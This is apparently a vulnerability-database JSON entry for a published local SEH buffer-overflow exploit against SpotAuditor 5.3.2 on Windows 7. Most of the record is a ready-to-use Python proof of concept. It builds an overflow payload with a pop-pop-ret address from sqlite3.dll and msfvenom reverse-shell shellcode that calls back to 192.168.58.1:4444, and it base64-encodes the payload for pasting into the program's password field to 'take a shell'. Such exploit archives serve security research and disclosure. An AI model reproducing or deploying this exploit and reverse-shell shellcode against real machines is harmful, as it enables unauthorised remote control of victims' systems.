Description
SpotAuditor 5.3.2 - Base64 Local Buffer Overflow (SEH)
{"lastseen": "2020-04-01T20:40:42", "references": [], "description": "\nSpotAuditor 5.3.2 - Base64 Local Buffer Overflow (SEH)", "edition": 1, "reporter": "Kirill Nikolaev", "exploitpack": {"type": "local", "platform": "windows"}, "published": "2019-12-09T00:00:00", "title": "SpotAuditor 5.3.2 - Base64 Local Buffer Overflow (SEH)", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.0, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2019-12-09T00:00:00", "id": "EXPLOITPACK:C41F90BF75BA715F22EBAB4D945A6FBB", "href": "", "viewCount": 3, "sourceData": "# Exploit Title: SpotAuditor 5.3.2 - 'Base64' Local Buffer Overflow (SEH)\n# Exploit Author: Kirill Nikolaev\n# Date: 2019-12-06\n# Vulnerable Software: SpotAuditor\n# Vendor Homepage: http://www.nsauditor.com/\n# Version: 5.3.2\n# Software Link: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe\n# Tested Windows 7 SP1 x86\n\n# PoC\n# 1. Download and install SpotAuditor\n# 2. Change shellcode in python script to yours\n# 3. Generate payload with python script\n# 4. Run the software \"Tools -> Base64 Encrypted Password\n# 5. Take a shell\n# Original DOS exploit https://www.exploit-db.com/exploits/47719\n\n#!/usr/bin/env python\n\nimport base64\nprint (\"[+] Thank you for choosing our company\")\nprint (\"[+] Local Buffer Overflow (SEH) in SpotAuditor 5.3.2\")\nprint (\"[+] Created By Kirill Nikolaev\")\nprint (\"[+] Generate payload,check, that you take your shellcode\")\nprint (\"\")\nhead='A'*1024\n#eb0c-jmp across a few bytes with seh address\njmp_across='\\x41\\x41\\xeb\\x0c'\n#0x61e0b194 : pop ebx # pop ebp # ret | {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.15.2 (C:\\Program Files\\Nsasoft\\SpotAuditor\\sqlite3.dll)\nseh='\\x94\\xb1\\xe0\\x61'\nheader_for_shellcode='\\x41'*10\n#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.58.1 LPORT=4444 -f py EXITFUNC=thread -b '\\x00'\nbuf = \"\"\nbuf += b\"\\xbd\\x7a\\xfe\\x84\\xdd\\xdb\\xc9\\xd9\\x74\\x24\\xf4\\x58\\x31\"\nbuf += b\"\\xc9\\xb1\\x52\\x83\\xe8\\xfc\\x31\\x68\\x0e\\x03\\x12\\xf0\\x66\"\nbuf += b\"\\x28\\x1e\\xe4\\xe5\\xd3\\xde\\xf5\\x89\\x5a\\x3b\\xc4\\x89\\x39\"\nbuf += b\"\\x48\\x77\\x3a\\x49\\x1c\\x74\\xb1\\x1f\\xb4\\x0f\\xb7\\xb7\\xbb\"\nbuf += b\"\\xb8\\x72\\xee\\xf2\\x39\\x2e\\xd2\\x95\\xb9\\x2d\\x07\\x75\\x83\"\nbuf += b\"\\xfd\\x5a\\x74\\xc4\\xe0\\x97\\x24\\x9d\\x6f\\x05\\xd8\\xaa\\x3a\"\nbuf += b\"\\x96\\x53\\xe0\\xab\\x9e\\x80\\xb1\\xca\\x8f\\x17\\xc9\\x94\\x0f\"\nbuf += b\"\\x96\\x1e\\xad\\x19\\x80\\x43\\x88\\xd0\\x3b\\xb7\\x66\\xe3\\xed\"\nbuf += b\"\\x89\\x87\\x48\\xd0\\x25\\x7a\\x90\\x15\\x81\\x65\\xe7\\x6f\\xf1\"\nbuf += b\"\\x18\\xf0\\xb4\\x8b\\xc6\\x75\\x2e\\x2b\\x8c\\x2e\\x8a\\xcd\\x41\"\nbuf += b\"\\xa8\\x59\\xc1\\x2e\\xbe\\x05\\xc6\\xb1\\x13\\x3e\\xf2\\x3a\\x92\"\nbuf += b\"\\x90\\x72\\x78\\xb1\\x34\\xde\\xda\\xd8\\x6d\\xba\\x8d\\xe5\\x6d\"\nbuf += b\"\\x65\\x71\\x40\\xe6\\x88\\x66\\xf9\\xa5\\xc4\\x4b\\x30\\x55\\x15\"\nbuf += b\"\\xc4\\x43\\x26\\x27\\x4b\\xf8\\xa0\\x0b\\x04\\x26\\x37\\x6b\\x3f\"\nbuf += b\"\\x9e\\xa7\\x92\\xc0\\xdf\\xee\\x50\\x94\\x8f\\x98\\x71\\x95\\x5b\"\nbuf += b\"\\x58\\x7d\\x40\\xcb\\x08\\xd1\\x3b\\xac\\xf8\\x91\\xeb\\x44\\x12\"\nbuf += b\"\\x1e\\xd3\\x75\\x1d\\xf4\\x7c\\x1f\\xe4\\x9f\\x42\\x48\\xdc\\x5e\"\nbuf += b\"\\x2b\\x8b\\x20\\x70\\xf7\\x02\\xc6\\x18\\x17\\x43\\x51\\xb5\\x8e\"\nbuf += b\"\\xce\\x29\\x24\\x4e\\xc5\\x54\\x66\\xc4\\xea\\xa9\\x29\\x2d\\x86\"\nbuf += b\"\\xb9\\xde\\xdd\\xdd\\xe3\\x49\\xe1\\xcb\\x8b\\x16\\x70\\x90\\x4b\"\nbuf += b\"\\x50\\x69\\x0f\\x1c\\x35\\x5f\\x46\\xc8\\xab\\xc6\\xf0\\xee\\x31\"\nbuf += b\"\\x9e\\x3b\\xaa\\xed\\x63\\xc5\\x33\\x63\\xdf\\xe1\\x23\\xbd\\xe0\"\nbuf += b\"\\xad\\x17\\x11\\xb7\\x7b\\xc1\\xd7\\x61\\xca\\xbb\\x81\\xde\\x84\"\nbuf += b\"\\x2b\\x57\\x2d\\x17\\x2d\\x58\\x78\\xe1\\xd1\\xe9\\xd5\\xb4\\xee\"\nbuf += b\"\\xc6\\xb1\\x30\\x97\\x3a\\x22\\xbe\\x42\\xff\\x42\\x5d\\x46\\x0a\"\nbuf += b\"\\xeb\\xf8\\x03\\xb7\\x76\\xfb\\xfe\\xf4\\x8e\\x78\\x0a\\x85\\x74\"\nbuf += b\"\\x60\\x7f\\x80\\x31\\x26\\x6c\\xf8\\x2a\\xc3\\x92\\xaf\\x4b\\xc6\"\ntail='B'*(5000-1028-4-10-len(buf))\nshellcode=head+jmp_across+seh+header_for_shellcode+buf\nprint (base64.b64encode(shellcode))\n\n\n--\nBest regards,\nKirill Nikolaev\nPenetration Tester", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645437018}}
{}
SpotAuditor 5.3.2 - Base64 Local Buffer Overflow (SEH)